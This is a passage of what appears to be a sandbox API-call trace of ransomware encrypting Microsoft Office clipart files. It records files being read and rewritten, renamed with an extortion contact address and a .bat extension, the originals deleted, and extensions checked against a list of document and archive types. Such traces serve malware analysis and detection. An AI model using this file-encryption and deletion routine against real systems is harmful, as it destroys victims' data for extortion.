lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.225] WriteFile (in: hFile=0x2c8, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.225] SetEndOfFile (hFile=0x2c8) returned 1 [0064.225] CloseHandle (hObject=0x2c8) returned 1 [0064.226] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.226] SetEndOfFile (hFile=0x350) returned 1 [0064.227] CloseHandle (hObject=0x350) returned 1 [0064.227] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.227] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01080_.wmf")) returned 1 [0064.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 68 [0064.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 68 [0064.228] lstrlenW (lpString=".doc") returned 4 [0064.228] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.228] lstrlenW (lpString=".docx") returned 5 [0064.228] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.228] lstrlenW (lpString=".pdf") returned 4 [0064.228] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.228] lstrlenW (lpString=".xls") returned 4 [0064.228] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.228] lstrlenW (lpString=".xlsx") returned 5 [0064.228] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.228] lstrlenW (lpString=".ppt") returned 4 [0064.228] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 68 [0064.228] lstrlenW (lpString=".zip") returned 4 [0064.228] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.228] lstrlenW (lpString=".rar") returned 4 [0064.228] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.228] lstrlenW (lpString=".bz2") returned 4 [0064.228] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.229] lstrlenW (lpString=".7z") returned 3 [0064.229] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 68 [0064.229] lstrlenW (lpString=".dbf") returned 4 [0064.229] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 68 [0064.229] lstrlenW (lpString=".1cd") returned 4 [0064.229] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 68 [0064.229] lstrlenW (lpString=".jpg") returned 4 [0064.229] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.229] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.229] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01636_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0064.230] GetLastError () returned 0x0 [0064.230] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x752, lpOverlapped=0x0) returned 1 [0064.271] WriteFile (in: hFile=0x2c8, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x760, lpOverlapped=0x0) returned 1 [0064.272] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.272] WriteFile (in: hFile=0x2c8, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.272] SetEndOfFile (hFile=0x2c8) returned 1 [0064.272] CloseHandle (hObject=0x2c8) returned 1 [0064.273] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.273] SetEndOfFile (hFile=0x350) returned 1 [0064.274] CloseHandle (hObject=0x350) returned 1 [0064.274] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.274] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01636_.wmf")) returned 1 [0064.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 68 [0064.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 68 [0064.275] lstrlenW (lpString=".doc") returned 4 [0064.275] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.275] lstrlenW (lpString=".docx") returned 5 [0064.275] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.275] lstrlenW (lpString=".pdf") returned 4 [0064.275] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.275] lstrlenW (lpString=".xls") returned 4 [0064.275] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.275] lstrlenW (lpString=".xlsx") returned 5 [0064.275] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.275] lstrlenW (lpString=".ppt") returned 4 [0064.275] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 68 [0064.275] lstrlenW (lpString=".zip") returned 4 [0064.275] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.275] lstrlenW (lpString=".rar") returned 4 [0064.275] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.275] lstrlenW (lpString=".bz2") returned 4 [0064.275] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.275] lstrlenW (lpString=".7z") returned 3 [0064.276] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 68 [0064.276] lstrlenW (lpString=".dbf") returned 4 [0064.276] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 68 [0064.276] lstrlenW (lpString=".1cd") returned 4 [0064.276] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 68 [0064.276] lstrlenW (lpString=".jpg") returned 4 [0064.276] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.278] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.279] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01639_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0064.279] GetLastError () returned 0x0 [0064.279] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x108c, lpOverlapped=0x0) returned 1 [0064.335] WriteFile (in: hFile=0x350, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x1090, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x1090, lpOverlapped=0x0) returned 1 [0064.335] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.336] WriteFile (in: hFile=0x350, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.336] SetEndOfFile (hFile=0x350) returned 1 [0064.339] CloseHandle (hObject=0x350) returned 1 [0064.340] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.340] SetEndOfFile (hFile=0x388) returned 1 [0064.342] CloseHandle (hObject=0x388) returned 1 [0064.342] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.342] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01639_.wmf")) returned 1 [0064.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 68 [0064.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 68 [0064.343] lstrlenW (lpString=".doc") returned 4 [0064.343] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.343] lstrlenW (lpString=".docx") returned 5 [0064.343] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.343] lstrlenW (lpString=".pdf") returned 4 [0064.343] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.343] lstrlenW (lpString=".xls") returned 4 [0064.343] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.343] lstrlenW (lpString=".xlsx") returned 5 [0064.343] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.343] lstrlenW (lpString=".ppt") returned 4 [0064.343] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 68 [0064.343] lstrlenW (lpString=".zip") returned 4 [0064.343] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.343] lstrlenW (lpString=".rar") returned 4 [0064.343] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.343] lstrlenW (lpString=".bz2") returned 4 [0064.343] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.343] lstrlenW (lpString=".7z") returned 3 [0064.343] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 68 [0064.343] lstrlenW (lpString=".dbf") returned 4 [0064.343] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 68 [0064.343] lstrlenW (lpString=".1cd") returned 4 [0064.343] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 68 [0064.343] lstrlenW (lpString=".jpg") returned 4 [0064.343] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.344] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.344] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.344] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\crane.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0064.344] GetLastError () returned 0x0 [0064.344] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x1496, lpOverlapped=0x0) returned 1 [0064.346] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x14a0, lpOverlapped=0x0) returned 1 [0064.347] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.347] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xe6, lpOverlapped=0x0) returned 1 [0064.347] SetEndOfFile (hFile=0x384) returned 1 [0064.347] CloseHandle (hObject=0x384) returned 1 [0064.348] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.348] SetEndOfFile (hFile=0x388) returned 1 [0064.349] CloseHandle (hObject=0x388) returned 1 [0064.349] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.349] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\crane.wmf")) returned 1 [0064.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 65 [0064.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 65 [0064.350] lstrlenW (lpString=".doc") returned 4 [0064.350] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.350] lstrlenW (lpString=".docx") returned 5 [0064.350] lstrcmpiW (lpString1=".docx", lpString2="E.WMF") returned -1 [0064.350] lstrlenW (lpString=".pdf") returned 4 [0064.350] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.350] lstrlenW (lpString=".xls") returned 4 [0064.350] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.350] lstrlenW (lpString=".xlsx") returned 5 [0064.350] lstrcmpiW (lpString1=".xlsx", lpString2="E.WMF") returned -1 [0064.350] lstrlenW (lpString=".ppt") returned 4 [0064.350] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 65 [0064.350] lstrlenW (lpString=".zip") returned 4 [0064.350] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.350] lstrlenW (lpString=".rar") returned 4 [0064.350] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.350] lstrlenW (lpString=".bz2") returned 4 [0064.350] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.350] lstrlenW (lpString=".7z") returned 3 [0064.350] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 65 [0064.350] lstrlenW (lpString=".dbf") returned 4 [0064.350] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 65 [0064.351] lstrlenW (lpString=".1cd") returned 4 [0064.351] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 65 [0064.351] lstrlenW (lpString=".jpg") returned 4 [0064.351] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.351] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.351] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.351] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\craninst.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0064.351] GetLastError () returned 0x0 [0064.351] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xc18a, lpOverlapped=0x0) returned 1 [0064.353] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xc190, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xc190, lpOverlapped=0x0) returned 1 [0064.355] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.355] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.355] SetEndOfFile (hFile=0x384) returned 1 [0064.355] CloseHandle (hObject=0x384) returned 1 [0064.356] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.356] SetEndOfFile (hFile=0x388) returned 1 [0064.357] CloseHandle (hObject=0x388) returned 1 [0064.358] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.358] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\craninst.wmf")) returned 1 [0064.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 68 [0064.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 68 [0064.358] lstrlenW (lpString=".doc") returned 4 [0064.358] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.358] lstrlenW (lpString=".docx") returned 5 [0064.358] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0064.358] lstrlenW (lpString=".pdf") returned 4 [0064.358] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.358] lstrlenW (lpString=".xls") returned 4 [0064.358] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.358] lstrlenW (lpString=".xlsx") returned 5 [0064.358] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0064.358] lstrlenW (lpString=".ppt") returned 4 [0064.358] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 68 [0064.359] lstrlenW (lpString=".zip") returned 4 [0064.359] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.359] lstrlenW (lpString=".rar") returned 4 [0064.359] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.359] lstrlenW (lpString=".bz2") returned 4 [0064.359] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.359] lstrlenW (lpString=".7z") returned 3 [0064.359] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 68 [0064.359] lstrlenW (lpString=".dbf") returned 4 [0064.359] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 68 [0064.359] lstrlenW (lpString=".1cd") returned 4 [0064.359] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 68 [0064.359] lstrlenW (lpString=".jpg") returned 4 [0064.359] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.359] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.359] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.359] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cup.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0064.360] GetLastError () returned 0x0 [0064.360] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xb96, lpOverlapped=0x0) returned 1 [0064.361] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xba0, lpOverlapped=0x0) returned 1 [0064.362] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.362] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xe2, lpOverlapped=0x0) returned 1 [0064.362] SetEndOfFile (hFile=0x384) returned 1 [0064.362] CloseHandle (hObject=0x384) returned 1 [0064.363] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.363] SetEndOfFile (hFile=0x388) returned 1 [0064.364] CloseHandle (hObject=0x388) returned 1 [0064.364] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.364] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cup.wmf")) returned 1 [0064.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 63 [0064.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 63 [0064.364] lstrlenW (lpString=".doc") returned 4 [0064.364] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.364] lstrlenW (lpString=".docx") returned 5 [0064.364] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1 [0064.365] lstrlenW (lpString=".pdf") returned 4 [0064.365] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.365] lstrlenW (lpString=".xls") returned 4 [0064.365] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.365] lstrlenW (lpString=".xlsx") returned 5 [0064.365] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1 [0064.365] lstrlenW (lpString=".ppt") returned 4 [0064.365] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") 